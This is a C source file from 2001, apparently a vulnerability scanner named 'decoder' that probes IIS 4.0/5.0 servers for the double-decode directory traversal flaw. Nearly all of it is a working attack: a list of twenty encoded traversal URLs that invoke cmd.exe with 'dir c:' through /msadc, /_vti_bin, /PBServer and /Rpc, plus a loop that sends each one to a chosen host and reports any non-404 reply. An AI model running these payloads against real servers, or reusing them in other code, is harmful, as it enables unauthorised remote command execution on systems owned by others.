/*-------------------------------------------------------------------*/
/* Decoder v1.00                                                     */
/* Erebus <erebus@fatelabs.com>					     */
/*                                                                   */
/*                                                                   */
/* (C) Copyright 2001 Fate Research Labs			     */
/*                                                                   */
/* Synopsis : decoder scans for Windows 2000 computers running IIS   */
/*            5.0 that are vulnerable to the executable directory    */
/*            decode vulnerability, aditionally it will scan for     */
/*	      Unicode strings as well.                               */
/*                                                                   */
/* Usage    : ./decoder <host> [ port ]                              */
/*                                                                   */
/* Greets   : Loki, ph33r, syphix, threx, vacuum, rfp                */
/*                                                                   */
/*-------------------------------------------------------------------*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

static char *attacks[] = {

  "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\\",
  "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\\",
  "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\\",
  "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\\",
  "/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\",
  "/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\\",
  "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\\",
  "/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\\",
  "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\\",
  "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\\",
  "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\\",
  "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\\",
  "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\",
  "/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\\",
  "/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\\",
  "/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\\",
  "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\",
  "/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\\",
  "/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe/c+dir+c:\\",
  "/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\\",
  "END"

};

int s;

struct hostent *he;
struct sockaddr_in target;

char buf[4096];
char buffer[4096];

int count = 0;

unsigned short p;

int usage(char *progname);

int main(int argc, char *argv[])
{

	printf("\n[decoder v1.00]\n");
	printf("[FateLabs / NorthernWatch, Inc.]\n");
	printf("[By]: Dan Dilber <ddilber@northernwatch.com>\n");
	printf("[Web]: www.northernwatch.com\n");

	if((argc != 2) && (argc != 3))
	{
		usage(argv[0]);
	}	

	if(argc == 3)
	{
		p = atoi(argv[2]);
	}
	else
	{
		p = 80;
	}

	if((he = gethostbyname(argv[1])) == NULL)
	{
		printf("\n[-]--- Cannot resolve %s\n\n", argv[1]);
		printf("[+]--- Exiting...\n\n");
		exit(-1);
	}

	if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
	{
		printf("\n[-]--- Fatal socket error\n\n");
		printf("[+]--- Exiting...\n\n");
		exit(-1);
	}

	target.sin_family = AF_INET;
	target.sin_port = htons(p);
	target.sin_addr = *((struct in_addr *)he->h_addr);

	if(connect(s, (struct sockaddr *)&target, sizeof(target)) == -1)
	{
		printf("\n[-]--- Unable to connect to %s:%d\n\n", argv[1], p);
		printf("[+]--- Exiting...\n\n");
		exit(-1);
	}
	else
	{
		printf("\n[+]--- Host %s is alive\n", argv[1]);
		printf("[+]--- Port %d is open\n", p);
	}


	if((send(s, "HEAD / HTTP/1.0\n\n", 17, 0)) == -1)
	{
		printf("\n[-]--- Unable to send data\n\n");
		printf("[+]--- Exiting...\n\n");
		exit(-1);
	}
	else if((recv(s, buf, 4096, 0) == -1))
	{
		printf("\n[-]-- Unable to receive data\n\n");
		printf("[+]--- Exiting...\n\n");
		exit(-1);
	}
	else
	{
		if(strstr(buf, "Microsoft-IIS/5.0"))
		{
			printf("\n[+]--- Host is running IIS 5.0\n");
			bzero(buf, 4096);
		}
		else if(strstr(buf, "Microsoft-IIS/4.0"))
		{
			printf("\n[+]--- Host is running IIS 4.0\n");
			bzero(buf, 4096);
		}
		else
		{
			printf("\n[-]--- Host is not running a vulnerable\n");
			printf("       version of IIS\n\n");
			printf("[+]--- Exiting...\n\n");
			exit(-1);
		}
	}

	close(s);

	printf("\n[+]--- Now beginning scan...\n\n");

	for(count=0;;count++)
	{

		if(strcmp(attacks[count], "END") == 0)
		{
			printf("\n\n[+]--- Scan has finished\n\n");
			break;
		}

		if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
			printf("\n[-]--- Fatal socket error\n\n");
			printf("[+]--- Exiting...\n\n");
			exit(-1);
		}

		if(connect(s, (struct sockaddr *)&target, sizeof(target)) == -1)
		{
			printf("\n[-]--- Unable to connect to %s:%d\n\n", argv[1], p);
			printf("[+]--- Exiting...\n\n");
			exit(-1);
		}

		snprintf(buffer, sizeof(buffer), "GET %s HTTP/1.0\n\n", attacks[count]);

		if((send(s, buffer, strlen(buffer), 0)) == -1)
		{
			printf("\n[-]--- Unable to send data\n\n");
			printf("[+]--- Exiting...\n\n");
			exit(-1);
		}
		else if((recv(s, buf, 4096, 0) == -1))
		{
			printf("\n[-]-- Unable to receive data\n\n");
			printf("[+]--- Exiting...\n\n");
			exit(-1);
		}
		else
		{
			if(!strstr(buf, "404 Object Not Found"))
			{
				printf("\n  [+]--- %s FOUND\n", attacks[count]);

				bzero(buffer, 4096);
				bzero(buf, 4096);
			}

			bzero(buffer, 4096);
			bzero(buf, 4096);

			close(s);

		}
	}

	printf("\n\n[+]--- Scan has finished\n\n");

	close(s);

	return 0;

}

int usage(char *progname)
{

	printf("\n[Purpose]: decoder scans for Windows 2000 computers\n");
	printf("           running IIS 5.0 that are vulnerable to the\n");
	printf("           executable directory decode vulnerability.\n\n");
	printf("[Usage]:\n\n");
	printf("%s <host> [ port ]\n\n", progname);

	exit(-1);

}
